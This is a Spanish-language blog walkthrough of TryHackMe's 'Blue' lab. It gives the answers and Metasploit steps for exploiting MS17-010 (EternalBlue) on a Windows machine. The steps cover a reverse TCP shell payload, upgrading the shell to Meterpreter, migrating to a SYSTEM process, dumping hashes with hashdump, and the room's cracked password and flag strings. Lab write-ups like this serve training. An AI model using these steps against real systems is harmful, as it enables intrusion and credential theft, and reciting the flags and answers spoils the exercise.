Saltar al contenido
Portada » Blog – Laprovittera Carlos » TryHackMe –  Blue

TryHackMe –  Blue

Hola hacketones! Bienvenidos a un nuevo CTF para la Certificación SEC1 de la ruta Cyber Security 101 de TryHackMe –  Blue

Blue Walkthrough

Implementa y hackea una máquina Windows, aprovechando problemas comunes de configuración errónea.

Analiza y descubre a qué vulnerabilidad es vulnerable esta máquina. Ten en cuenta que no responde a ping (ICMP) y puede tardar unos minutos en arrancar. Esta sala no pretende ser un CTF boot2root, sino una serie educativa para principiantes. Los profesionales probablemente no obtendrán mucho más que práctica básica, ya que el proceso está enfocado a principiantes. 

¿Cuántos puertos están abiertos con un número de puerto inferior a 1000?

3

¿A qué es vulnerable esta máquina? (Responda en el formato: ms??-???, por ejemplo: ms08-067)

ms17-010

Tarea 2 Obtenga acceso

Aprovecha la máquina y consigue una posición ventajosa.

Responda las siguientes preguntas

Encuentra el código de explotación que ejecutaremos contra la máquina. ¿Cuál es la ruta completa del código? (Ej: exploit/……..)

exploit/windows/smb/ms17_010_eternalblue

Muestra las opciones y establece el valor requerido. ¿Cuál es el nombre de este valor? (Escribe en mayúsculas para enviar)

RHOSTS

Normalmente, no habría problema en ejecutar este exploit tal cual; sin embargo, para fines de aprendizaje, debes hacer una cosa más antes de explotar el objetivo. Introduce el siguiente comando y pulsa Intro:

set payload windows/x64/shell/reverse_tcp

Una vez hecho esto, ¡ejecuta el exploit!

Confirma que el exploit se haya ejecutado correctamente. Es posible que tengas que pulsar Intro para que aparezca la consola de DOS. Minimiza esta consola (CTRL + Z). Si esto falla, es posible que tengas que reiniciar la máquina virtual objetivo. Intenta ejecutarlo de nuevo antes de reiniciar la máquina virtual. 

Tarea 3 Escalar

Escala privilegios, aprende cómo actualizar shells enmetasploit.

Responda las siguientes preguntas

Si aún no lo has hecho, pon en segundo plano la shell obtenida previamente (CTRL + Z). Busca en internet cómo convertir una shell a una shell Meterpreter en Metasploit. ¿Cuál es el nombre del módulo posterior que utilizaremos? (Ruta exacta, similar a la del exploit que seleccionamos anteriormente). 

post/multi/manage/shell_to_meterpreter

Seleccione esto (use MODULE_PATH). Mostrar opciones, ¿qué opción debemos cambiar?

SESSION

Configure la opción requerida; es posible que deba listar todas las sesiones para encontrar su objetivo aquí. 

¡Corre! Si esto no funciona, intenta completar la explotación de la tarea anterior una vez más.

Una vez completada la conversión del shell de Meterpreter, seleccione esa sesión para usarla.

Verifique que hayamos escalado a NT AUTHORITY\SYSTEM. Ejecute getsystem para confirmarlo. Puede abrir una consola de DOS mediante el comando ‘shell’ y ejecutar ‘whoami’. Esto debería indicar que efectivamente somos el sistema. Luego, minimice la ejecución de esta consola y seleccione nuestra sesión de Meterpreter para volver a usarla. 

Enumera todos los procesos que se ejecutan mediante el comando ‘ps’. El hecho de que seamos el sistema no significa que nuestro proceso también lo sea. Busca un proceso cerca del final de esta lista que se esté ejecutando en NT AUTHORITY\SYSTEM y anota su ID (columna de la izquierda).

Migra a este proceso usando el comando ‘migrate PROCESS_ID’, donde el ID del proceso es el que anotaste en el paso anterior. Esto puede requerir varios intentos, ya que la migración de procesos no es muy estable. Si falla, es posible que debas volver a ejecutar el proceso de conversión o reiniciar la máquina y comenzar de nuevo. Si esto sucede, intenta con un proceso diferente la próxima vez. 

Tarea 4 Cracking

¡Obtén la contraseña del usuario no predeterminado y descifrala!

Responda las siguientes preguntas

Dentro de nuestra consola Meterpreter con privilegios elevados, ejecuta el comando ‘hashdump’. Esto extraerá todas las contraseñas de la máquina, siempre y cuando tengamos los permisos necesarios. ¿Cuál es el nombre del usuario no predeterminado? 

Jon

Copia este hash de contraseña en un archivo e investiga cómo descifrarlo. ¿Cuál es la contraseña descifrada?

Alqfna22

Tarea 5 ¡Encuentra banderas!

Encuentra las tres banderas plantadas en esta máquina. No son banderas tradicionales, sino que representan ubicaciones clave dentro del sistema Windows. ¡Usa las pistas que se proporcionan a continuación para completar esta sala!

Responda las siguientes preguntas

¿ Bandera 1? Esta bandera se encuentra en la raíz del sistema. 

flag{access_the_machine}

¿Bandera 2? Esta bandera se encuentra en la ubicación donde se almacenan las contraseñas en Windows.

*Errata: Windows no suele aceptar bien la ubicación de esta bandera y, en ocasiones, puede eliminarla. En algunos casos, puede ser necesario reiniciar el equipo y volver a ejecutar el exploit para encontrarla. Esto es relativamente raro, pero puede ocurrir. 

flag{sam_database_elevated_access}

¿Bandera 3? Esta bandera se encuentra en un lugar excelente para saquear. Al fin y al cabo, los administradores suelen tener cosas bastante interesantes guardadas. 

flag{admin_documents_can_be_valuable}

Sigan entrenando, Hacketones, Nos vemos en el próximo laboratorio!!!

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *